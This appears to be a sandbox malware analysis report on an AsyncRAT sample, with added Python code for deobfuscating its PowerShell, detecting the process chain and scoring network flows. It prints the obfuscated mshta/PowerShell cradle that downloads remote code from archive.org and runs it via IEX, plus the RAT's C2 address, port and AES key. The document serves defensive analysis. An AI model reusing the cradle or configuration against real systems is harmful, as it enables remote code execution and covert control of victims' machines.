
Analysis Report xGrfj8RvYg.exe

Overview

General Information

Sample Name: xGrfj8RvYg.exe
Analysis ID: 433020
MD5: 722603aa75534bec9d1191f062fb2c03
SHA1: 321ea5aa8368f394dcbdcc6ce7ebaab89861150d
SHA256: 3e7cecddd88f1fdc8eb055ef6ab1eacfadb706582cb0fe190d99e493baa78691
Tags: AsyncRAT, exe, RAT

Detection

AsyncRAT
Score: 92 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AsyncRAT
Creates an undocumented autostart registry key
Injects a PE file into a foreign processes
Obfuscated command line found
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Suspicious PowerShell Command Line
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for the Microsoft Outlook file path
Sigma detected: Non Interactive PowerShell
Tries to load missing DLLs
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • xGrfj8RvYg.exe (PID: 4832 cmdline: 'C:\Users\user\Desktop\xGrfj8RvYg.exe' MD5: 722603AA75534BEC9D1191F062FB2C03)
    • mshta.exe (PID: 1276 cmdline: 'C:\Windows\System32\mshta.exe' https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txt MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
      • powershell.exe (PID: 3468 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT ='https://ia601509.us.archive.org/21/items/all-lol-123_20210603/ALL_lol123.TXT';$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS='Down^^^^^^^^^^^^^string'.Replace('^^^^^^^^^^^^^','load');$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO = 'WebBANKnt'.Replace('BANK','Clie');$T4RDTHFTJGJKHL='WFt'.Replace('WF','NE');$EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE='(NewYEAe'.Replace('YEA','-Obj');$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF='ct System.$T4RDTHFTJGJKHL.$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO).$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS($TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT)';I`E`X ($EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE,$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF -Join '')|I`E`X MD5: 95000560239032BC68B4C2FDFCDEF913)
        • conhost.exe (PID: 1564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • powershell.exe (PID: 3680 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windo 1 -noexit -exec bypass -file C:\Users\Public\-----Run+++++++++.ps1 MD5: 95000560239032BC68B4C2FDFCDEF913)
          • aspnet_compiler.exe (PID: 6396 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe MD5: 17CC69238395DF61AAF483BCEF02E7C9)
          • aspnet_compiler.exe (PID: 6800 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe MD5: 17CC69238395DF61AAF483BCEF02E7C9)
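The PID 3468 command line above is the whole delivery chain in one string: every interesting word is built with .Replace() on a decoy literal and glued together by -Join, so neither DownloadString nor WebClient appears anywhere in the command. To recover what it does without running it (never IEX a sample's stage on an analysis box; the first IEX fetches remote text and the second executes it), the following Python statically evaluates the .Replace() chains and the -Join and then expands the variables the way the first IEX would. This is an added example, not part of the Joe Sandbox report; the command line is the one quoted in the process tree, and keying the run-of-one-letter variable names by their letter is my own readability choice.

```python
import re

# The obfuscated powershell.exe command line from the process tree above (PID 3468),
# reproduced from the report. Everything around it is an added example.
CMDLINE = (
    "$TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT ='https://ia601509.us.archive.org/21/items/all-lol-123_20210603/ALL_lol123.TXT';"
    "$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS='Down^^^^^^^^^^^^^string'.Replace('^^^^^^^^^^^^^','load');"
    "$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO = 'WebBANKnt'.Replace('BANK','Clie');"
    "$T4RDTHFTJGJKHL='WFt'.Replace('WF','NE');"
    "$EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE='(NewYEAe'.Replace('YEA','-Obj');"
    "$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF='ct System.$T4RDTHFTJGJKHL.$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO).$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS($TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT)';"
    "I`E`X ($EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE,$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF -Join '')|I`E`X"
)

# $name = 'literal'.Replace('a','b').Replace(...)   (single quotes: nothing is expanded)
ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*'([^']*)'((?:\.Replace\('[^']*','[^']*'\))*)", re.I)
REPLACE_RE = re.compile(r"\.Replace\('([^']*)','([^']*)'\)", re.I)
VAR_RE = re.compile(r"\$(\w+)")
# I`E`X ($a,$b -Join '')  -> the pieces are concatenated and the result evaluated as code
IEX_JOIN_RE = re.compile(r"I`?E`?X\s*\(\s*((?:\$\w+\s*,\s*)*\$\w+)\s+-Join\s+''\s*\)", re.I)
PIPE_IEX_RE = re.compile(r"\|\s*I`?E`?X\s*$", re.I)


def canon(name):
    """Key a variable spelled as a run of one letter ($TTTT...) by that letter so the
    table stays readable; other names ($T4RDTHFTJGJKHL) are kept whole. Two distinct
    variables that are runs of the same letter would collide; this sample has none."""
    return name[0] if len(set(name)) == 1 else name


def resolve_assignments(cmdline):
    """Evaluate each 'literal'.Replace(...) chain without PowerShell. String.Replace is
    an ordinal, case-sensitive substitution, exactly what str.replace does."""
    env = {}
    for m in ASSIGN_RE.finditer(cmdline):
        name, value, chain = m.group(1), m.group(2), m.group(3)
        for old, new in REPLACE_RE.findall(chain):
            value = value.replace(old, new)
        env[canon(name)] = value
    return env


def expand(code, env):
    """Substitute $var references; unknown names are left as written."""
    return VAR_RE.sub(lambda m: env.get(canon(m.group(1)), m.group(0)), code)


def analyze(cmdline):
    env = resolve_assignments(cmdline)
    m = IEX_JOIN_RE.search(cmdline)
    if not m:
        raise ValueError("no IEX(... -Join '') pattern found")
    # Stage 1: the joined string is what the first IEX evaluates as code. Inside the
    # single-quoted $F literal the variables stayed literal, but once that text runs as
    # code they expand: System.$T4... becomes the type name, .$S( a dynamic method name,
    # ($T) the argument.
    stage1 = "".join(env[canon(n)] for n in VAR_RE.findall(m.group(1)))
    resolved = expand(stage1, env)
    url = re.search(r"https?://[^\s'\")]+", resolved)
    return {
        "env": env,
        "stage1": resolved,
        "url": url.group(0) if url else None,
        # Stage 2: whatever DownloadString returns is piped into the second IEX and run
        "downloaded_text_is_executed": bool(PIPE_IEX_RE.search(cmdline)),
    }


if __name__ == "__main__":
    result = analyze(CMDLINE)
    for k, v in result["env"].items():
        print(f"${k:<15} = {v!r}")
    print("stage 1:", result["stage1"])
    print("fetches:", result["url"], "| piped to IEX:", result["downloaded_text_is_executed"])
```

The resolved stage is a plain WebClient download cradle, (New-Object System.NEt.WebClient).Downloadstring(...) on the ALL_lol123.TXT URL, whose output is piped into IEX. The next stage therefore lives at that URL and not in the command line, and any detection that waits for DownloadString, WebClient or Net to appear literally in the command line misses this sample; the process tree shows the stage it leads to, a second powershell.exe running C:\Users\Public\-----Run+++++++++.ps1.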

Malware Configuration

Threatname: AsyncRAT

{"Server": "216.230.75.62", "Ports": "1107", "Version": "0.5.7B", "Autorun": "false", "Install_Folder": "%AppData%", "Install_File": "windonws.exe", "AES_key": "SZyWY7zJ1VdyEsSSd7sfsCsuxNXhSZI0", "Mutex": "AsyncMutex_6SI8OkPnk", "AntiDetection": "false", "External_config_on_Pastebin": "null", "BDOS": "false", "Startup_Delay": "3", "HWID": "null", "Certificate": "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", "ServerSignature": "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", "Group": "Default"}

Yara Overview

Dropped Files

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\Clean_lol123[1].txt
Rule: webshell_asp_obfuscated (ASP webshell obfuscated), author Arnim Rupp
Strings:
  • 0x55:$tagasp_long20: <script language="VB
  • 0xdc:$asp_payload11: WScript.Shell
  • 0xce:$asp_multi_payload_one1: CreateObject
  • 0xce:$asp_multi_payload_four1: CreateObject
  • 0xce:$asp_cr_write1: CreateObject(
  • 0x220:$m_multi_one1: Replace(
  • 0x282:$m_multi_one1: Replace(
  • 0x2af:$m_multi_one1: Replace(
  • 0x2fb:$m_multi_one1: Replace(

Memory Dumps

Source: 00000017.00000000.310047645.0000000000402000.00000040.00000001.sdmp
Rule: JoeSecurity_AsyncRAT (Yara detected AsyncRAT), author Joe Security

Source: 00000017.00000002.467029735.0000000000402000.00000040.00000001.sdmp
Rule: JoeSecurity_AsyncRAT (Yara detected AsyncRAT), author Joe Security

Source: 00000002.00000003.214415545.00000208942AB000.00000004.00000001.sdmp
Rule: PowerShell_Case_Anomaly (Detects obfuscated PowerShell hacktools), author Florian Roth
Strings:
  • 0x90a8:$s1: pOWeRsHeLL

Source: 00000002.00000002.217899024.0000020893D10000.00000004.00000001.sdmp
Rule: PowerShell_Case_Anomaly (Detects obfuscated PowerShell hacktools), author Florian Roth
Strings:
  • 0x146:$s1: pOWeRsHeLL

Source: 00000002.00000002.218422171.00000208942AD000.00000004.00000001.sdmp
Rule: PowerShell_Case_Anomaly (Detects obfuscated PowerShell hacktools), author Florian Roth
Strings:
  • 0x70a8:$s1: pOWeRsHeLL

(2 further entries are not expanded in this report view)

Unpacked PEs

Source: 23.2.aspnet_compiler.exe.400000.0.unpack
Rule: JoeSecurity_AsyncRAT (Yara detected AsyncRAT), author Joe Security

Source: 23.0.aspnet_compiler.exe.400000.0.unpack
Rule: JoeSecurity_AsyncRAT (Yara detected AsyncRAT), author Joe Security

Sigma Overview

System Summary:

Sigma detected: MSHTA Spawning Windows Shell
Source: Process started. Author: Michael Haag. Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT ='https://ia601509.us.archive.org/21/items/all-lol-123_20210603/ALL_lol123.TXT';$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS='Down^^^^^^^^^^^^^string'.Replace('^^^^^^^^^^^^^','load');$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO = 'WebBANKnt'.Replace('BANK','Clie');$T4RDTHFTJGJKHL='WFt'.Replace('WF','NE');$EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE='(NewYEAe'.Replace('YEA','-Obj');$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF='ct System.$T4RDTHFTJGJKHL.$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO).$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS($TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT)';I`E`X ($EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE,$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF -Join '')|I`E`X, CommandLine: (same as Command), CommandLine|base64offset|contains: (no value), Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txt, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 1276, ProcessCommandLine: (same as Command), ProcessId: 3468
Sigma detected: Suspicious PowerShell Command Line
Source: Process started. Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community. Data: the same process-creation event as the entry above (Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3468, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 1276); Command, CommandLine and ProcessCommandLine carry the obfuscated command line quoted there, all other fields are identical.
Sigma detected: Non Interactive PowerShell
Source: Process started. Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements). Data: the same process-creation event as the entries above (ProcessId: 3468, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 1276), all fields identical.
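All three Sigma hits above fire on one event, powershell.exe spawned by mshta.exe, which is the point at which this chain is cheapest to catch. As an added example that is neither Joe Sandbox's nor the Sigma project's code, the Python below runs the same three checks over process-creation events and adds a fourth of my own for the stage that follows: a .NET framework utility started by PowerShell with no arguments at all, which is what a hollowed host looks like in process telemetry (compare the report's "Creates a process in suspended mode" and "Injects a PE file into a foreign processes" signatures and the AsyncRAT unpack from aspnet_compiler.exe). The events are constructed from the report's process tree; the shell list for the mshta rule and the PowerShell indicators approximate the Sigma rules' logic rather than reproducing their exact conditions, the hollowing-host list is my own, and the benign build-shell events are mine.

```python
import re

# Process-creation events constructed from the process tree in this report: PIDs,
# parents and image paths are the ones listed there; the long obfuscated PowerShell
# command line (PID 3468) is cut down to the tokens the rules key on. The last two
# events are a benign control I added (a build shell running aspnet_compiler.exe with
# real arguments). Constructed test data, not sandbox output.
EVENTS = [
    {"pid": 4832, "ppid": 1, "image": r"C:\Users\user\Desktop\xGrfj8RvYg.exe",
     "cmdline": r"'C:\Users\user\Desktop\xGrfj8RvYg.exe'"},
    {"pid": 1276, "ppid": 4832, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"'C:\Windows\System32\mshta.exe' https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txt"},
    {"pid": 3468, "ppid": 1276, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $T='https://ia601509.us.archive.org/21/items/all-lol-123_20210603/ALL_lol123.TXT';$S='Down^string'.Replace('^','load');I`E`X ($E,$F -Join '')|I`E`X"},
    {"pid": 1564, "ppid": 3468, "image": r"C:\Windows\system32\conhost.exe",
     "cmdline": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
    {"pid": 3680, "ppid": 3468, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windo 1 -noexit -exec bypass -file C:\Users\Public\-----Run+++++++++.ps1"},
    {"pid": 6396, "ppid": 3680, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe",
     "cmdline": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"},
    {"pid": 7001, "ppid": 1, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"C:\Windows\System32\cmd.exe"},
    {"pid": 7000, "ppid": 7001, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe",
     "cmdline": r"aspnet_compiler.exe -v / -p C:\src\site -c"},
]

SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
# .NET framework utilities that .NET loaders commonly start suspended and hollow.
# My own starting list; extend it from your telemetry.
HOLLOW_HOSTS = {"aspnet_compiler.exe", "regasm.exe", "regsvcs.exe", "installutil.exe", "msbuild.exe"}

# Indicators for the PowerShell command line. None of them needs DownloadString or
# WebClient to appear literally, which is exactly what the sample's .Replace() trick hides.
PS_INDICATORS = {
    # a backtick splitting a word, as in I`E`X; the escape letters `n `t `r `a `b `e `f `v `u `0 are excluded
    "backtick_split_token": re.compile(r"[A-Za-z]`[^ntrabefvu0\s`]"),
    "invoke_expression": re.compile(r"(?:\bIEX\b|I`E`X|Invoke-Expression)", re.I),
    "replace_then_join": re.compile(r"\.Replace\(.*-Join\b", re.I | re.S),
    "url_in_cmdline": re.compile(r"https?://", re.I),
    "execution_policy_bypass": re.compile(r"-e[a-z]*\s+bypass\b", re.I),  # -ep / -ex / -exec / -executionpolicy
    "hidden_window": re.compile(r"-w[a-z]*\s+(?:1|hidden)\b", re.I),  # -w / -windo / -windowstyle; 1 is Hidden
}


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def has_no_arguments(cmdline):
    """True when the command line is just the program token (quoted or bare)."""
    m = re.match(r"""\s*(?:'[^']*'|"[^"]*"|\S+)\s*(.*)$""", cmdline, re.S)
    return m is not None and m.group(1).strip() == ""


def powershell_indicators(cmdline):
    return [name for name, rx in PS_INDICATORS.items() if rx.search(cmdline)]


def detect(events, ps_threshold=2):
    """Return {pid: set(rule names)} for the events that match."""
    by_pid = {e["pid"]: e for e in events}
    findings = {}

    def hit(pid, rule):
        findings.setdefault(pid, set()).add(rule)

    for e in events:
        image = basename(e["image"])
        parent = by_pid.get(e["ppid"])
        parent_image = basename(parent["image"]) if parent else None
        # Sigma "MSHTA Spawning Windows Shell": mshta.exe as the parent of a shell
        if parent_image == "mshta.exe" and image in SHELLS:
            hit(e["pid"], "mshta_spawning_shell")
        if image in {"powershell.exe", "pwsh.exe"}:
            # Sigma "Non Interactive PowerShell": not started from the desktop shell
            if parent_image != "explorer.exe":
                hit(e["pid"], "noninteractive_powershell")
            # Sigma "Suspicious PowerShell Command Line", here as an indicator count
            if len(powershell_indicators(e["cmdline"])) >= ps_threshold:
                hit(e["pid"], "suspicious_powershell_cmdline")
        # Hollowing candidate: a .NET utility started by a shell with no arguments at all
        if image in HOLLOW_HOSTS and parent_image in SHELLS and has_no_arguments(e["cmdline"]):
            hit(e["pid"], "dotnet_utility_without_arguments_under_shell")
    return findings


def chain(events, pid):
    """Ancestry of a PID as image names, root first."""
    by_pid = {e["pid"]: e for e in events}
    out = []
    while pid in by_pid:
        out.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return out[::-1]


if __name__ == "__main__":
    for pid, rules in sorted(detect(EVENTS).items()):
        print(pid, " -> ".join(chain(EVENTS, pid)), sorted(rules))
```

Run against these events, PID 3468 trips all three Sigma-style checks, the second powershell.exe (PID 3680, -windo 1 -exec bypass -file) trips two, and the argument-less aspnet_compiler.exe under PowerShell trips the hollowing heuristic while the build-shell control with real arguments does not. The indicator threshold of two is a tuning knob: a single indicator such as a URL in a PowerShell command line is common in administration scripts, the combination of backtick-split tokens with .Replace()/-Join is not.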

Signature Overview

AV Detection:

Found malware configuration
Source: 00000017.00000000.310047645.0000000000402000.00000040.00000001.sdmp; Malware Configuration Extractor: AsyncRAT {"Server": "216.230.75.62", "Ports": "1107", "Version": "0.5.7B", "Autorun": "false", "Install_Folder": "%AppData%", "Install_File": "windonws.exe", "AES_key": "SZyWY7zJ1VdyEsSSd7sfsCsuxNXhSZI0", "Mutex": "AsyncMutex_6SI8OkPnk", "AntiDetection": "false", "External_config_on_Pastebin": "null", "BDOS": "false", "Startup_Delay": "3", "HWID": "null", "Certificate": "MIIE8jCCAtqgAwIBAgIQAMKnEVcvuQIQtAqxOy+oYTANBgkqhkiG9w0BAQ0FADAaMRgwFgYDVQQDDA9Bc3luY1JBVCBTZXJ2ZXIwIBcNMjEwNTE5MTM0ODQ1WhgPOTk5OTEyMzEyMzU5NTlaMBoxGDAWBgNVBAMMD0FzeW5jUkFUIFNlcnZlcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAJvrsFgFjIMG1rYF1vehk3BhjSHAlQ5Noq7MIKWRa9CgdZHCTN/Gh9VwaWUYqMuzn6F4pGWgSAmwwuuouwlMe4g37Srpvawl5ocRkOnMC4MAsh08mucPg8f/kUN3DFtqO2yfgr3i83yX9keSdfqaCRcUoXh8Qhqa5F8Mlkd2yVOcsZvmTvaLsCtRZo9YOMZ/fnPBzu2NS+xv3qaqW723pMfbrFS04iokkSp5pRQhQRWPCNJ737a0ac9gBS/g1nAuElqEl62AgbprR6YAqsbsrSDo6kOEx7t071C7gbJaO4lu33Kchi/gIC3ftleFFQhqjWTIfxcOp/kuej5DIHH9QvyE12oi1qFc8dn+EVZ2yENyQcx4NOx73zUmFh20JIMW2x4qOfuT+MkkUstDEezdXOec8PzkGMhclDzMmhD3ZA1oIGnsupJHRTTPqMHHw8tx48rj09Xv4TQARpmMffPbW+GmunkNmKHqOsMN8oj2iVwbRK7mg+UJfUyQ+hhTz/AqeWaoRGjLJVSX/R6fs2uWXX6GD8ECOxEJfnm5hLQxwr0RRwOLqu+oVMvFqOZ3+4G1UD7QIIPESId0n6EdnDCLIGuk6PqXpqR7QQU+zvRmeK6VHOH/btjAYUNkEAM6gO0Z6hk6xDeCGxXnqtr3FWyk7V9FZoi4OSzqDPvyYf849Q1nAgMBAAGjMjAwMB0GA1UdDgQWBBR2rTenBO42ADwEdSVfGFG7Id35BjAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4ICAQBkM4Am3dA31vOlVb3L4HKAuNkOPN+Iw4uslCNRYxtAc3xbiaqC8tXWcNvzNWfVdTOYjdEbo8g5+weIaD7D5vmoHzvkkyEm9+1EMMl8KcMo4I/jQmvObI74N31e43thfQb0OPP32xc3M2gRpxplMLyPGl9M22u8r5tQPo2JX/YpP5oa8gSZLo4LK2grkQLI45aGm1CWuqrpReCckH6UZOoR2EeDHf+VDcSrNQ0KJUG6tyEWWUg0FTs0hham+juKVb7Ai9ktQekAfJpAz0GGIXjd4YRwug5GabiJTbL5vW64E8q38Lz/rITER9f1Tho9r7bw9EKTGp1Q6MB9PSLHxOBeefDvpxIO6G+O8p+s7Gd5GEFDkF9z6UxVeJifhI4G2fwTz3IkbpzlZ2lBslkCy/iHGYSRDwOvhA+VDmzKXJHoW7BK1PgBQcZ2m+N8BNIHScqCanzHjQhoFMJL9f7r+/rqtJ/ranxVgK+66zGwMf6MW3u9PF93O3bln9A7Yr6dEhKReQDi0R9/qhJbqisz7Fmo8/6zn715MHHfz2pRPGlPFQKuqug8RfieY8maAZj11TUtQuOiToVFoRQHtbT1JjYQXTq++aXZA47BRKFnqmVIj+zLGHo/FkWbraZL+35yLAfwwlE/YopW+uYFcIHAHgDQhWmfD7MuiwYAY4YtNkgi5g==", "ServerSignature": "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", "Group": "Default"}
Source: 23.2.aspnet_compiler.exe.400000.0.unpack; Avira: Label: TR/Dropper.Gen
Source: unknown; HTTPS traffic detected: 207.241.227.119:443 -> 192.168.2.3:49719 version: TLS 1.0
Source: unknown; HTTPS traffic detected: 207.241.227.126:443 -> 192.168.2.3:49727 version: TLS 1.0
Source: unknown; HTTPS traffic detected: 207.241.224.2:443 -> 192.168.2.3:49728 version: TLS 1.0
Source: unknown; HTTPS traffic detected: 207.241.232.198:443 -> 192.168.2.3:49729 version: TLS 1.0
Source: unknown; HTTPS traffic detected: 207.241.227.112:443 -> 192.168.2.3:49715 version: TLS 1.2
Source: xGrfj8RvYg.exe; Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: C:\Users\Win 10 test Antiviru\Desktop\NORD VPN\NORD VPN\obj\Debug\NORD VPN.pdb source: xGrfj8RvYg.exe

          Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic; Snort IDS: 2030673 ET TROJAN Observed Malicious SSL Cert (AsyncRAT Server) 216.230.75.62:1107 -> 192.168.2.3:49747
Source: global traffic; TCP traffic: 192.168.2.3:49747 -> 216.230.75.62:1107
Source: Joe Sandbox View; IP Address: 207.241.227.126
Source: Joe Sandbox View; IP Address: 207.241.227.112
Source: Joe Sandbox View; IP Address: 207.241.224.2
Source: Joe Sandbox View; JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View; JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown; HTTPS traffic detected: 207.241.227.119:443 -> 192.168.2.3:49719 version: TLS 1.0
Source: unknown; HTTPS traffic detected: 207.241.227.126:443 -> 192.168.2.3:49727 version: TLS 1.0
Source: unknown; HTTPS traffic detected: 207.241.224.2:443 -> 192.168.2.3:49728 version: TLS 1.0
Source: unknown; HTTPS traffic detected: 207.241.232.198:443 -> 192.168.2.3:49729 version: TLS 1.0
Source: unknown; TCP traffic detected without corresponding DNS query: 216.230.75.62 (47 identical entries)
Source: unknown; DNS traffic detected: queries for: ia601502.us.archive.org
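The network entries above separate the two halves of this sample's traffic with three cheap checks: the archive.org hosts are resolved by DNS, on 443, with a legacy TLS version on most sessions, while 216.230.75.62:1107 is never resolved, sits on an unusual port, and is the one address the Snort rule and the extracted config agree on. As an added example that is not part of the report, the Python below applies the same three checks to flow and DNS records. The endpoints, ports and TLS versions are the ones listed in this section; the name-to-address mapping for the archive.org hosts is my assumption, since the report shows only the query name, and no TLS version is given for the 1107 session.

```python
import ipaddress

# Flow and DNS records constructed from this report's Networking section. Endpoints,
# ports and TLS versions are the ones it lists; which archive.org name resolved to
# which 207.241.x address is assumed for the example, and the TLS version of the
# 216.230.75.62:1107 session is not given. Constructed test data, not sandbox output.
DNS_ANSWERS = [
    {"name": "ia601502.us.archive.org", "addr": "207.241.227.119"},
    {"name": "ia601509.us.archive.org", "addr": "207.241.227.126"},
    {"name": "ia601406.us.archive.org", "addr": "207.241.224.2"},
    {"name": "ia803408.us.archive.org", "addr": "207.241.232.198"},
    {"name": "archive.org", "addr": "207.241.227.112"},
]
FLOWS = [
    {"src": "192.168.2.3", "sport": 49715, "dst": "207.241.227.112", "dport": 443, "tls": "TLSv1.2"},
    {"src": "192.168.2.3", "sport": 49719, "dst": "207.241.227.119", "dport": 443, "tls": "TLSv1.0"},
    {"src": "192.168.2.3", "sport": 49727, "dst": "207.241.227.126", "dport": 443, "tls": "TLSv1.0"},
    {"src": "192.168.2.3", "sport": 49728, "dst": "207.241.224.2", "dport": 443, "tls": "TLSv1.0"},
    {"src": "192.168.2.3", "sport": 49729, "dst": "207.241.232.198", "dport": 443, "tls": "TLSv1.0"},
    {"src": "192.168.2.3", "sport": 49747, "dst": "216.230.75.62", "dport": 1107, "tls": None},
]

EXPECTED_PORTS = {80, 443}  # what a workstation is expected to talk to outbound; tune per environment
LEGACY_TLS = {"SSLv2", "SSLv3", "TLSv1.0", "TLSv1.1"}


def is_external(addr):
    # is_global excludes RFC 1918, loopback, link-local and multicast ranges
    return ipaddress.ip_address(addr).is_global


def score_flows(flows, dns_answers):
    """Return {dst_ip: set(reasons)} for external destinations worth a look."""
    resolved = {a["addr"] for a in dns_answers}
    findings = {}
    for f in flows:
        if not is_external(f["dst"]):
            continue
        reasons = set()
        if f["dst"] not in resolved:
            # a hard-coded address, as the AsyncRAT config's "Server" field is
            reasons.add("no_dns_resolution")
        if f["dport"] not in EXPECTED_PORTS:
            reasons.add("nonstandard_port")
        if f["tls"] in LEGACY_TLS:
            reasons.add("legacy_tls")
        if reasons:
            findings.setdefault(f["dst"], set()).update(reasons)
    return findings


def rank(findings):
    """Destinations with the most independent reasons first."""
    return sorted(findings, key=lambda d: (-len(findings[d]), d))


if __name__ == "__main__":
    found = score_flows(FLOWS, DNS_ANSWERS)
    for dst in rank(found):
        print(dst, sorted(found[dst]))
```

Two things worth noticing in the output. The legacy_tls reason fires only on the archive.org delivery hosts (the report's "Uses insecure TLS / SSL version for HTTPS connection" entries are all 207.241.x addresses), so on its own it points at the wrong half of the traffic; it is the pairing of no_dns_resolution with nonstandard_port that isolates 216.230.75.62:1107, the same endpoint the Snort rule 2030673 and the extracted config name. Ranking by the number of independent reasons rather than by any single one is what keeps the CDN noise below the C2.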
Source: powershell.exe, 00000003.00000002.478315679.0000027D87F6F000.00000004.00000001.sdmp; String found in binary or memory: http://archive.org
Source: mshta.exe, 00000002.00000002.216634769.0000020091AF8000.00000004.00000020.sdmp, powershell.exe, 00000003.00000002.477549946.0000027D87D00000.00000004.00000001.sdmp; String found in binary or memory: http://certificates.godaddy.com/repository/0
Source: mshta.exe, 00000002.00000002.216634769.0000020091AF8000.00000004.00000020.sdmp, powershell.exe, 00000003.00000002.477549946.0000027D87D00000.00000004.00000001.sdmp; String found in binary or memory: http://certificates.godaddy.com/repository/gdig2.crt0
